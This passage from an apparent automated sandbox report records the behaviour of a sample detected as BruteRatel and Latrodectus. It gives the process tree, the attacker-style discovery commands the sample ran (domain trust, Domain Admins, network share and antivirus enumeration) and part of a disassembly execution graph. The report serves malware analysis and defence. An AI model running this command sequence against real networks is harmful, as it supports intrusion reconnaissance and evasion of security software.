                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000003.2394515342.000001DA031BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000002.4600031642.000001DA0329C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000002.4600031642.000001DA0330C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000002.4597607083.000001DA0318C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:11:55:26
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                Imagebase:0x7ff609140000
                                                                                                                                File size:5'141'208 bytes
                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.4606571879.000000000950A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:11:56:54
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c ipconfig /all
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:11
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:ipconfig /all
                                                                                                                                Imagebase:0x7ff7651f0000
                                                                                                                                File size:35'840 bytes
                                                                                                                                MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:12
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c systeminfo
                                                                                                                                Imagebase:0x7ff6ae840000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:13
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:14
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:systeminfo
                                                                                                                                Imagebase:0x7ff769e30000
                                                                                                                                File size:110'080 bytes
                                                                                                                                MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:15
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                Imagebase:0x7ff717f30000
                                                                                                                                File size:496'640 bytes
                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:16
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c nltest /domain_trusts
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:17
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:18
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\nltest.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:nltest /domain_trusts
                                                                                                                                Imagebase:0x7ff6de3c0000
                                                                                                                                File size:540'672 bytes
                                                                                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:19
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c nltest /domain_trusts /all_trusts
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:20
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:21
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\nltest.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:nltest /domain_trusts /all_trusts
                                                                                                                                Imagebase:0x7ff6de3c0000
                                                                                                                                File size:540'672 bytes
                                                                                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:22
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c net view /all /domain
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:23
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:24
                                                                                                                                Start time:11:56:57
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:net view /all /domain
                                                                                                                                Imagebase:0x7ff645da0000
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:25
                                                                                                                                Start time:11:57:09
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c net view /all
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:26
                                                                                                                                Start time:11:57:09
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:27
                                                                                                                                Start time:11:57:09
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:net view /all
                                                                                                                                Imagebase:0x7ff645da0000
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:28
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c net group "Domain Admins" /domain
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:29
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:30
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:net group "Domain Admins" /domain
                                                                                                                                Imagebase:
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:31
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net1.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\net1 group "Domain Admins" /domain
                                                                                                                                Imagebase:
                                                                                                                                File size:183'808 bytes
                                                                                                                                MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:32
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                                                                                                                                Imagebase:
                                                                                                                                File size:576'000 bytes
                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:33
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:34
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:/c net config workstation
                                                                                                                                Imagebase:
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:35
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:36
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:net config workstation
                                                                                                                                Imagebase:
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:37
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net1.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\net1 config workstation
                                                                                                                                Imagebase:
                                                                                                                                File size:183'808 bytes
                                                                                                                                MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:38
                                                                                                                                Start time:11:57:23
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                                                                                                                                Imagebase:
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:39
                                                                                                                                Start time:11:57:23
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:40
                                                                                                                                Start time:11:57:23
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                                                                                                                                Imagebase:
                                                                                                                                File size:576'000 bytes
                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:41
                                                                                                                                Start time:11:57:23
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:findstr /V /B /C:displayName
                                                                                                                                Imagebase:
                                                                                                                                File size:36'352 bytes
                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:0.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:98.2%
                                                                                                                                  Signature Coverage:18.6%
                                                                                                                                  Total number of Nodes:226
                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                  execution_graph 82987 180037788 82988 1800377aa _ftell_nolock 82987->82988 82989 1800377da 82988->82989 82990 180037806 82988->82990 82991 1800377e6 82988->82991 83057 18002cc10 82989->83057 82992 180037854 82990->82992 82995 180037849 82990->82995 83045 18002f26c 63 API calls _getptd_noexit 82991->83045 82996 180037869 82992->82996 83049 180037538 65 API calls 3 library calls 82992->83049 83048 18002f26c 63 API calls _getptd_noexit 82995->83048 83037 18003ec20 82996->83037 82998 1800377eb 83046 18002f2dc 63 API calls _getptd_noexit 82998->83046 83004 1800377f3 83047 180035cb8 12 API calls _invalid_parameter_noinfo 83004->83047 83006 180037ebe WriteFile 83008 180037ee8 GetLastError 83006->83008 83009 180037edd 83006->83009 83028 180037b34 83008->83028 83009->83008 83010 180037899 GetConsoleMode 83012 1800378d9 83010->83012 83010->83028 83011 180037f0d 83011->82989 83055 18002f2dc 63 API calls _getptd_noexit 83011->83055 83013 1800378e8 GetConsoleCP 83012->83013 83012->83028 83013->83011 83033 18003790c _write_nolock 83013->83033 83015 180037c37 WriteFile 83017 180037b5f GetLastError 83015->83017 83015->83028 83016 180037f39 83056 18002f26c 63 API calls _getptd_noexit 83016->83056 83017->83028 83019 180037dfa WideCharToMultiByte 83022 180037e46 WriteFile 83019->83022 83023 180037b69 GetLastError 83019->83023 83020 180037d24 WriteFile 83020->83017 83031 180037cd6 83020->83031 83021 180037f06 83054 18002f28c 63 API calls 2 library calls 83021->83054 83026 180037e93 GetLastError 83022->83026 83022->83031 83023->83028 83026->83031 83028->82989 83028->83006 83028->83011 83028->83015 83028->83019 83028->83020 83028->83021 83052 18002f2dc 63 API calls _getptd_noexit 83028->83052 83053 18002f26c 63 API calls _getptd_noexit 83028->83053 83029 1800379be WideCharToMultiByte 83029->83028 83032 180037a01 WriteFile 83029->83032 83031->83022 83031->83028 83032->83023 83034 180037a3c 83032->83034 83033->83028 83033->83029 83033->83034 83051 180038ddc 63 API calls _LocaleUpdate::_LocaleUpdate 83033->83051 83034->83023 83034->83028 83034->83033 83035 18003ff78 WriteConsoleW CreateFileW _write_nolock 83034->83035 83036 180037a5c WriteFile 83034->83036 83035->83034 83036->83017 83036->83034 83038 18003ec36 83037->83038 83039 18003ec29 83037->83039 83042 180037870 83038->83042 83067 18002f2dc 63 API calls _getptd_noexit 83038->83067 83066 18002f2dc 63 API calls _getptd_noexit 83039->83066 83042->83028 83050 1800389f4 63 API calls 2 library calls 83042->83050 83043 18003ec6d 83068 180035cb8 12 API calls _invalid_parameter_noinfo 83043->83068 83045->82998 83046->83004 83047->82989 83048->82998 83049->82996 83050->83010 83051->83033 83052->83028 83053->83028 83054->83011 83055->83016 83056->82989 83058 18002cc19 83057->83058 83059 18002cc24 83058->83059 83060 1800357c8 IsProcessorFeaturePresent 83058->83060 83061 1800357df 83060->83061 83069 180032858 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 83061->83069 83063 1800357f2 83070 18003577c SetUnhandledExceptionFilter UnhandledExceptionFilter IsDebuggerPresent _call_reportfault 83063->83070 83066->83042 83067->83043 83068->83042 83069->83063 83071 18002da78 83072 18002db0c 83071->83072 83083 18002da90 83071->83083 83094 180036dc0 DecodePointer 83072->83094 83074 18002dac8 HeapAlloc 83074->83083 83087 18002db01 83074->83087 83075 18002db11 83095 18002f2dc 63 API calls _getptd_noexit 83075->83095 83078 18002daf1 83092 18002f2dc 63 API calls _getptd_noexit 83078->83092 83082 18002daf6 83093 18002f2dc 63 API calls _getptd_noexit 83082->83093 83083->83074 83083->83078 83083->83082 83086 18002daa8 83083->83086 83091 180036dc0 DecodePointer 83083->83091 83086->83074 83088 180036dfc 63 API calls 2 library calls 83086->83088 83089 180036e70 63 API calls 7 library calls 83086->83089 83090 180036898 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 83086->83090 83088->83086 83089->83086 83091->83083 83092->83082 83093->83087 83094->83075 83095->83087 83096 1da01410b00 83100 1da01410b1c 83096->83100 83103 1da01410b36 83096->83103 83097 1da01410c3c VirtualAlloc 83098 1da01410c6f 83097->83098 83099 1da01410cb1 VirtualAlloc 83097->83099 83098->83099 83098->83103 83101 1da01410cf3 83099->83101 83099->83103 83100->83097 83100->83103 83102 1da01410e97 VirtualAlloc 83101->83102 83101->83103 83102->83103 83104 1800354ac 83105 1800354d3 GetLocaleInfoEx 83104->83105 83106 1800354d7 __crtDownlevelLocaleNameToLCID 83104->83106 83107 1800354ec 83105->83107 83108 1800354dc GetLocaleInfoW 83106->83108 83108->83107 83109 7ffd92dbb620 83110 7ffd92eaeb60 83109->83110 83112 7ffd92eaebcd 83110->83112 83113 7ffd92dca5a0 VirtualAlloc 83110->83113 83114 18002f10c 83115 18002f128 83114->83115 83117 18002f12d 83114->83117 83128 180039844 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 83115->83128 83121 18002f1b8 83117->83121 83124 18002f182 83117->83124 83129 18002efac 83117->83129 83120 18002f1ff 83123 18002efac _CRT_INIT 107 API calls 83120->83123 83120->83124 83121->83124 83177 1800026a0 83121->83177 83123->83124 83125 1800026a0 _DllMainCRTStartup 180 API calls 83126 18002f1f2 83125->83126 83127 18002efac _CRT_INIT 107 API calls 83126->83127 83127->83120 83128->83117 83130 18002f03b 83129->83130 83131 18002efbe 83129->83131 83133 18002f091 83130->83133 83139 18002f03f _CRT_INIT 83130->83139 83181 180036780 GetProcessHeap 83131->83181 83135 18002f0f4 83133->83135 83136 18002f096 83133->83136 83134 18002efc3 83166 18002efc7 _CRT_INIT 83134->83166 83182 180038b60 68 API calls 7 library calls 83134->83182 83135->83166 83207 1800389b8 63 API calls 2 library calls 83135->83207 83206 180032904 TlsGetValue 83136->83206 83139->83166 83202 1800368b0 65 API calls free 83139->83202 83143 18002f067 83154 18002f076 _CRT_INIT 83143->83154 83203 18003670c 64 API calls free 83143->83203 83146 18002efd3 _RTC_Initialize 83149 18002efe3 GetCommandLineA 83146->83149 83146->83166 83148 18002f071 83204 180038be0 TlsFree _mtterm 83148->83204 83183 1800398f0 GetEnvironmentStringsW 83149->83183 83154->83166 83205 180038be0 TlsFree _mtterm 83154->83205 83160 18002f001 83163 18002f005 83160->83163 83164 18002f00c 83160->83164 83197 180038be0 TlsFree _mtterm 83163->83197 83198 180039454 76 API calls 3 library calls 83164->83198 83166->83121 83169 18002f011 83170 18002f025 83169->83170 83199 180039710 75 API calls 6 library calls 83169->83199 83176 18002f029 83170->83176 83201 18003670c 64 API calls free 83170->83201 83173 18002f039 83173->83163 83174 18002f01a 83174->83170 83200 180036a30 74 API calls 5 library calls 83174->83200 83176->83166 83178 1800026b4 83177->83178 83179 1800026a8 83177->83179 83178->83120 83178->83125 83210 1800026c0 83179->83210 83181->83134 83182->83146 83184 18002eff5 83183->83184 83185 18003991e WideCharToMultiByte 83183->83185 83196 1800363dc 67 API calls 5 library calls 83184->83196 83187 1800399be FreeEnvironmentStringsW 83185->83187 83188 18003996d 83185->83188 83187->83184 83208 180031b68 63 API calls malloc 83188->83208 83190 180039975 83190->83187 83191 18003997d WideCharToMultiByte 83190->83191 83192 1800399a5 83191->83192 83193 1800399b0 FreeEnvironmentStringsW 83191->83193 83209 18002d5f4 63 API calls 2 library calls 83192->83209 83193->83184 83195 1800399ad 83195->83193 83196->83160 83198->83169 83199->83174 83200->83170 83201->83173 83202->83143 83203->83148 83207->83166 83208->83190 83209->83195 83262 180002cb0 GetModuleFileNameW 83210->83262 83212 180002709 _vsnprintf_helper 83213 18000275b 6 API calls 83212->83213 83272 180005f70 83213->83272 83217 180002843 83280 180005250 161 API calls 2 library calls 83217->83280 83219 180002855 83220 18000287f 83219->83220 83281 1800023f0 65 API calls 2 library calls 83219->83281 83221 180002ac1 83220->83221 83282 180006a80 65 API calls 2 library calls 83220->83282 83298 180005360 90 API calls 2 library calls 83221->83298 83225 180002895 83283 180003260 111 API calls 5 library calls 